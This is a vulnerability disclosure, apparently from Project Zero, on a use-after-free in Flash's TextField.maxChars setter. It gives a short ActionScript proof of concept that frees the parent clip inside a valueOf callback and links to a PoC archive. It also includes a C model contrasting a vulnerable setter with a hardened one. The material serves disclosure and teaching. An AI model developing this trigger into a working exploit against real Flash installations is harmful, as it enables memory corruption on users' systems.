
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=581
There is a use-after-free in the TextField.maxChars setter. If maxChars is set to an object that defines valueOf, the setter calls that valueOf function to coerce the value to a number; the callback can free the field's parent object, which the setter then continues to use. A minimal PoC is as follows:
var times = 0;

// Create a movie clip and give it a child TextField. The clip (mc) is the
// field's parent, the object that gets freed while the setter still uses it.
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);

// Assigning an object instead of a number makes the setter call valueOf()
// to coerce it, so script runs while the setter is mid-operation.
tf.maxChars = {valueOf : func};

function func(){
    // The PoC lets the first valueOf() call return normally and only
    // frees the parent on a later call.
    if (times == 0){
        times++;
        return 7;
    }
    // Free the field's parent from inside the setter's callback.
    mc.removeMovieClip();

    // Fix heap here

    return 7;
}
A sample swf and fla are attached.
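To make the bug pattern concrete, here is an added C model of the setter, not code from the Flash player or from the original report. It assumes a simplified object graph (a MovieClip owning a TextField), a ScriptValue with an optional valueOf hook standing in for the AS2 object {valueOf: func}, and a single valueOf call per setter invocation (the real PoC frees on a later call; the model frees on the first). "Freeing" is modelled with an alive flag rather than free() so the use-after-free is reported instead of triggering undefined behaviour. The vulnerable setter caches the parent pointer across the script callback; the hardened one re-reads and validates it afterwards.

```c
#include <stdio.h>
#include <stdlib.h>

/* Constructed model of the object graph: a MovieClip owns a TextField. */
typedef struct MovieClip MovieClip;
typedef struct TextField TextField;

struct TextField {
    MovieClip *parent;   /* back-pointer to the owning clip */
    int max_chars;
};

struct MovieClip {
    TextField *field;
    int alive;           /* 1 while the object's memory is valid */
    int width;           /* some property the setter reads from the parent */
};

/* Script-visible value with an optional valueOf() coercion hook
 * (assumed shape, mirroring {valueOf: func} in the PoC). */
typedef struct {
    int number;                   /* used when value_of is NULL */
    int (*value_of)(void *ctx);   /* script callback, may run arbitrary code */
    void *ctx;
} ScriptValue;

#define UAF_DETECTED (-1)   /* returned when a freed parent would be used */
#define SET_REFUSED  0      /* hardened setter bailed out safely */

/* Model of mc.removeMovieClip(): detach the field and release the clip. */
static void remove_movie_clip(MovieClip *mc) {
    mc->alive = 0;
    if (mc->field) {
        mc->field->parent = NULL;
        mc->field = NULL;
    }
}

/* In the real player this dereference is the use-after-free; here it is
 * only reported. Returns the parent's width on success. */
static int use_parent(MovieClip *mc) {
    if (!mc || !mc->alive) return UAF_DETECTED;
    return mc->width;
}

/* VULNERABLE: holds a raw parent pointer across the valueOf() callback and
 * uses it afterwards without checking that the object still exists. */
static int set_max_chars_vulnerable(TextField *tf, ScriptValue v) {
    MovieClip *parent = tf->parent;                      /* cached pre-callback */
    int n = v.value_of ? v.value_of(v.ctx) : v.number;   /* script runs here */
    tf->max_chars = n;
    return use_parent(parent);                           /* dangling if freed */
}

/* HARDENED: run the coercion first, then re-read the parent and stop if the
 * field was detached or its parent freed while script was running. */
static int set_max_chars_hardened(TextField *tf, ScriptValue v) {
    int n = v.value_of ? v.value_of(v.ctx) : v.number;
    MovieClip *parent = tf->parent;                      /* re-read post-callback */
    if (!parent || !parent->alive) return SET_REFUSED;
    tf->max_chars = n;
    return use_parent(parent);
}

/* Callback standing in for func() in the PoC: frees the parent, returns 7. */
typedef struct { MovieClip *mc; int calls; } PocCtx;
static int poc_value_of(void *p) {
    PocCtx *c = (PocCtx *)p;
    c->calls++;
    remove_movie_clip(c->mc);
    return 7;
}

/* Drive a setter with the PoC's freeing valueOf() object. */
static int run_poc(int (*setter)(TextField *, ScriptValue)) {
    MovieClip mc = { NULL, 1, 100 };
    TextField tf = { &mc, 0 };
    mc.field = &tf;
    PocCtx ctx = { &mc, 0 };
    ScriptValue v = { 0, poc_value_of, &ctx };
    return setter(&tf, v);
}

/* Drive a setter with a plain number, the non-malicious case. */
static int run_benign(int (*setter)(TextField *, ScriptValue)) {
    MovieClip mc = { NULL, 1, 100 };
    TextField tf = { &mc, 0 };
    mc.field = &tf;
    ScriptValue v = { 7, NULL, NULL };
    return setter(&tf, v);
}

int main(void) {
    printf("vulnerable/poc: %d (-1 = use-after-free)\n", run_poc(set_max_chars_vulnerable));
    printf("hardened/poc:   %d (0 = refused safely)\n", run_poc(set_max_chars_hardened));
    printf("benign:         %d / %d\n", run_benign(set_max_chars_vulnerable),
                                         run_benign(set_max_chars_hardened));
    return 0;
}
```

The general lesson the model shows is the one behind this class of Flash bugs: any native setter that can re-enter script (through valueOf, toString, getters, or event handlers) must either hold a strong reference to every object it touches across that call or re-validate those objects afterwards; caching a raw pointer before the callback is exactly what the PoC exploits.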
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39650.zip